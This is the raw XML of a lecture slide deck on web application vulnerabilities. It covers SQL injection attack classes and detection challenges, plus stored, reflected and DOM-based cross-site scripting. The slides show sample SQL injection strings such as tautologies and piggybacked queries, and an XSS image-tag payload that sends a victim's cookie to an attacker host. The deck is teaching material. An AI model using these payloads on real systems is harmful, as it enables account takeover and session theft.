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3" r:id="rId3"/>
    <p:sldId id="284" r:id="rId4"/>
    <p:sldId id="286" r:id="rId5"/>
    <p:sldId id="287" r:id="rId6"/>
    <p:sldId id="311" r:id="rId7"/>
    <p:sldId id="289" r:id="rId8"/>
    <p:sldId id="290" r:id="rId9"/>
    <p:sldId id="273" r:id="rId10"/>
    <p:sldId id="274" r:id="rId11"/>
    <p:sldId id="275" r:id="rId12"/>
    <p:sldId id="276" r:id="rId13"/>
    <p:sldId id="315" r:id="rId14"/>
    <p:sldId id="278" r:id="rId15"/>
    <p:sldId id="279" r:id="rId16"/>
    <p:sldId id="291" r:id="rId17"/>
    <p:sldId id="292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2" r:id="rId26"/>
    <p:sldId id="303" r:id="rId27"/>
    <p:sldId id="312" r:id="rId28"/>
    <p:sldId id="313" r:id="rId29"/>
    <p:sldId id="31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4" autoAdjust="0"/>
    <p:restoredTop sz="94671" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="108" d="100"/>
          <a:sy n="108" d="100"/>
        </p:scale>
        <p:origin x="180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hahriar\Desktop\Tutorial%20Slides\Statistics-vuln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895953911888971E-2"/>
          <c:y val="2.2194486616263841E-2"/>
          <c:w val="0.88493899451670321"/>
          <c:h val="0.89492823297938318"/>
        </c:manualLayout>
      </c:layout>
      <c:barChart>
        <c:barDir val="col"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>2005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(osvdb!$C$2,osvdb!$E$2)</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="2"/>
                <c:pt idx="0">
                  <c:v>1175</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1364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BB-4B47-8C1C-BB568092196A}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>2006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(osvdb!$C$3,osvdb!$E$3)</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="2"/>
                <c:pt idx="0">
                  <c:v>1574</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2024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BB-4B47-8C1C-BB568092196A}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:v>2007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(osvdb!$C$4,osvdb!$E$4)</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="2"/>
                <c:pt idx="0">
                  <c:v>1010</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1392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9BB-4B47-8C1C-BB568092196A}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:v>2008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(osvdb!$C$5,osvdb!$E$5)</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="2"/>
                <c:pt idx="0">
                  <c:v>1907</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1536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9BB-4B47-8C1C-BB568092196A}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="4"/>
          <c:order val="4"/>
          <c:tx>
            <c:v>2009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(osvdb!$C$6,osvdb!$E$6)</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="2"/>
                <c:pt idx="0">
                  <c:v>1179</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1462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9BB-4B47-8C1C-BB568092196A}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="5"/>
          <c:order val="5"/>
          <c:tx>
            <c:v>2010</c:v>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>(osvdb!$C$1,osvdb!$E$1)</c:f>
              <c:strCache>
                <c:ptCount val="2"/>
                <c:pt idx="0">
                  <c:v>SQL Injection</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Cross Site Scripting</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>(osvdb!$C$7,osvdb!$E$7)</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="2"/>
                <c:pt idx="0">
                  <c:v>657</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>919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9BB-4B47-8C1C-BB56809219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6067608"/>
        <c:axId val="356072704"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="356067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rgbClr val="0000CC"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="356072704"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="3560727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aseline="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="3560676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4F21F2-F979-4719-BC46-90578C1DD75F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/1/2020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F5DE3-8A11-4EE6-9BA2-D34CD5864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102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4A85FB-3C3A-4B07-A86D-50B0DD4FC85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736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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240644" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3884414" y="8684381"/>
            <a:ext cx="2972098" cy="458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567" tIns="45283" rIns="90567" bIns="45283" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
            <a:fld id="{CCB03836-2063-47DE-9FAD-1ED709D33C06}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>4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1693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F4A85FB-3C3A-4B07-A86D-50B0DD4FC85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903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/>
              <a:t>Change the diagram</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89269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458200" cy="685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50900"/>
            <a:ext cx="4152900" cy="5245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86300" y="850900"/>
            <a:ext cx="4152900" cy="2546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86300" y="3549650"/>
            <a:ext cx="4152900" cy="2546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M. Zulkernine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QRST-</a:t>
            </a:r>
            <a:fld id="{57AF9941-BE8A-4F3D-B5E8-69479F627826}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" b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904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458200" cy="685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50900"/>
            <a:ext cx="4152900" cy="5245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850900"/>
            <a:ext cx="4152900" cy="5245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M. Zulkernine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QRST-</a:t>
            </a:r>
            <a:fld id="{210506D4-F045-4AF2-A722-C13D294192F5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" b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44309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openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject4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Web Application Vulnerability and Mitigation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709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80975"/>
            <a:ext cx="8991600" cy="55245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Legitimate access to an account (step 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36866" name="Picture 2" descr="After login, the webapge that can be found by a use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833438"/>
            <a:ext cx="89439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07737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8991600" cy="73342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200" dirty="0"/>
              <a:t>Access to an account through SQL Injection (step 1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12290" name="Picture 2" descr="At attacker looking to login to a book store using sql injection attack input in the login nam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009649"/>
            <a:ext cx="8534400" cy="452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35214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1" y="0"/>
            <a:ext cx="8991599" cy="733425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Access through an SQL Injection attack (step 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36866" name="Picture 2" descr="After attack, the login page for bookstore, the same page that a valid user can se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" y="833438"/>
            <a:ext cx="8943975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4051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1" y="0"/>
            <a:ext cx="8991599" cy="733425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Example of code with vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Analysis of code for sql injection. The input login and password coming from input form of bookstore become part of dynamic sql query in lines 5 and 6, eventually leading to tautology attack.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5173A49-4943-4C55-9CBE-3F4D74A7B33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295400"/>
            <a:ext cx="6629400" cy="396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608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14300"/>
            <a:ext cx="8610600" cy="5334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/>
              <a:t>SQL Injection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977461"/>
            <a:ext cx="8305800" cy="5140309"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SQL queries that are dynamically generated with supplied inputs may get their intended structures altered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Lack of input validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Reported as #2 vulnerability by OWASP in 2010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Tautologies (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Anley</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 2001)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>’ or 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" dirty="0"/>
              <a:t>'greg' like  '%gr%’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Piggybacked queries (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Halfond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 2005)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>’; show tables; --</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2320438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685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600"/>
              <a:t>SQL Injection attack classification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179204" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1066800"/>
            <a:ext cx="83820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81000" indent="-3810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marL="800100" indent="-3429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marL="1219200" indent="-3048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marL="1638300" indent="-2667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marL="2095500" indent="-2667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2552700" indent="-2667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3009900" indent="-2667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3467100" indent="-2667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3924300" indent="-2667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Blip>
                <a:blip r:embed="rId2"/>
              </a:buBlip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800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Halfond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> et al. classified SQLIAs into seven categories.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
              <a:effectLst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Tautologies </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>’ or 1=1 -- </a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" altLang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="nb-NO" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>'greg' LIKE '%gr%'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" i="1" dirty="0">
              <a:effectLst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UNION queries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' UNION SELECT  1,1 --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Illegal/logical incorrect queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>’ or 1 = (1 --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Piggybacked queries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’; show tables; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/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Inference attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>'; /*! select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>('1','2') */ \g -- (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>mySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>vii) '; /*! select ‘1’ + ‘2’ */ \g -- (MS SQL) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:effectLst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Alternate encodings (or Hex encoded queries)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0x206F7220313D31 (Hexadecimal representation of ‘” or 1=1‘).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>
                <a:effectLst/>
              </a:rPr>
              <a:t>Stored procedures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US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459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14300"/>
            <a:ext cx="8610600" cy="7239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200" dirty="0"/>
              <a:t>Challenges of SQLI attack detection approaches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143000"/>
            <a:ext cx="8305800" cy="4974770"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Meta character filtering: Usually done by writing regular expressions, but attackers find meta character sequence to defeat the protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Static analysis: Suffers from false positive warning and performs worse for scripting language that have dynamic data type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Prepared statement: Limited support for implementation languages like Java and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and requires retrofitting the legacy code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Randomization of SQL keywords: Requires modification of SQL database query engine, which may not be suitable for legacy application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17757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66675"/>
            <a:ext cx="8534400" cy="628650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Test case generation: Attack signature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7373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872359"/>
            <a:ext cx="8534400" cy="5376041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Replace some parts of normal URLs with attack signatures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Signatures are developed from the experience and vulnerability reports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http://www.xyz.com/login.php?name=john&amp;pwd=secret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http://www.xyz.com/login.php?name=‘ or 1=1&amp;pwd=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How do we visit web pages?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Randomly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/>
              <a:t>Use case-based </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17099154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14300"/>
            <a:ext cx="8610600" cy="80010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US" sz="3600" dirty="0"/>
              <a:t>Cross Site Scripting (XSS) vulnerabilities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71600"/>
            <a:ext cx="8305800" cy="4343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/>
              <a:t>The generation of HTML contents with invalidated inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Inputs are interpreted by browsers as valid HTML tags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The intended behavior of generated web pages alters </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Visible symptoms (pop-up window) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Invisible symptoms (reading form fields, cookies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="6248400"/>
            <a:ext cx="1981200" cy="33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9CC670BF-328A-4E94-9AF2-375B50B1E333}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF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pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF00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9284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143000" y="152400"/>
            <a:ext cx="77724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Posting a benign comment (step 1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 6" descr="A blog posting about harry poter movie experienc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849086"/>
            <a:ext cx="7943850" cy="509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A blog posting about harry poter movie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371600"/>
            <a:ext cx="2438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09600" y="5943600"/>
            <a:ext cx="83275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/>
              <a:t>Source: JSP Blog, http://sourceforge.net</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="942415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199" y="0"/>
            <a:ext cx="8466083" cy="762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sz="3200" dirty="0"/>
              <a:t>Web application vulnerabilities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066800"/>
            <a:ext cx="8305800" cy="5181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Input processing code resides at the server side and response pages are generated at the client side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Vulnerabilities may be present in both sides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Specific flaws in server side code (inputs not filtered properly)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Inherent features of browser (cookies stored for longer time period)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Allow attackers to expose or alter sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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32545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6106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Viewing a benign comment (step 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44034" name="Picture 2" descr="The blog posting is appearing on the page for all user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1093732"/>
            <a:ext cx="723900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90870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Posting a malicious comment (step 1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45058" name="Picture 2" descr="A bad guy is posting javascript code in the blog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318" y="1090448"/>
            <a:ext cx="83629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1398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Viewing a malicious comment (step 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46083" name="Picture 3" descr="the outcome of the script code (a pop up dialog) that can be accessed by all user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4900" y="852488"/>
            <a:ext cx="69342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57853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Viewing a malicious comment (step 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47106" name="Picture 2" descr="XSS is ranked as top 5 vulnerabilitie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981075"/>
            <a:ext cx="72390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762000" y="1828800"/>
            <a:ext cx="3429000" cy="3810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2400" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)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Execution of attacker’s supplied code in victim’s browser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Ranked among top 5 vulnerability by OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Visible (pop-up window) and invisible symptoms (accessing sensitive information)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty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1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304800" y="152400"/>
            <a:ext cx="86106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Posting a malicious script to steal cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45058" name="Picture 2" descr="An example of xss attack to steal document cookie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090448"/>
            <a:ext cx="7857468" cy="4395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114800" y="3124200"/>
            <a:ext cx="3657600" cy="1143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fr-FR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fr-FR" sz="1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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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fr-FR" sz="16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= ‘http://attackerweb.com/ steal.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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?+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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’/&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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4990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10600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>XSS attack types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3994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87972"/>
            <a:ext cx="8458200" cy="506992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/>
              <a:t>Stored: Injected code is stored by server programs and used to generate response pages later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Reflected:  Injected code is directly sent back to browsers by server programs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  <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>DOM-based:  Injected code is processed by the client-side JavaScript without sanitization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3721461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534400" cy="5334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A reflected XSS attack example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="510979" name="Object 3" descr="a portal access by user named joe.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03289043"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1066800" y="1219200"/>
          <a:ext cx="2295525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Bitmap Image" r:id="rId3" imgW="2933333" imgH="1752381" progId="PBrush">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Bitmap Image" r:id="rId3" imgW="2933333" imgH="175238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219200"/>
                        <a:ext cx="2295525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0980" name="Object 4" descr="a portal access outcome for user joe.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3412782652"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5029200" y="1196975"/>
          <a:ext cx="2817813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" name="Bitmap Image" r:id="rId5" imgW="2895238" imgH="1523810" progId="PBrush">
                  <p:embed/>
                </p:oleObj>
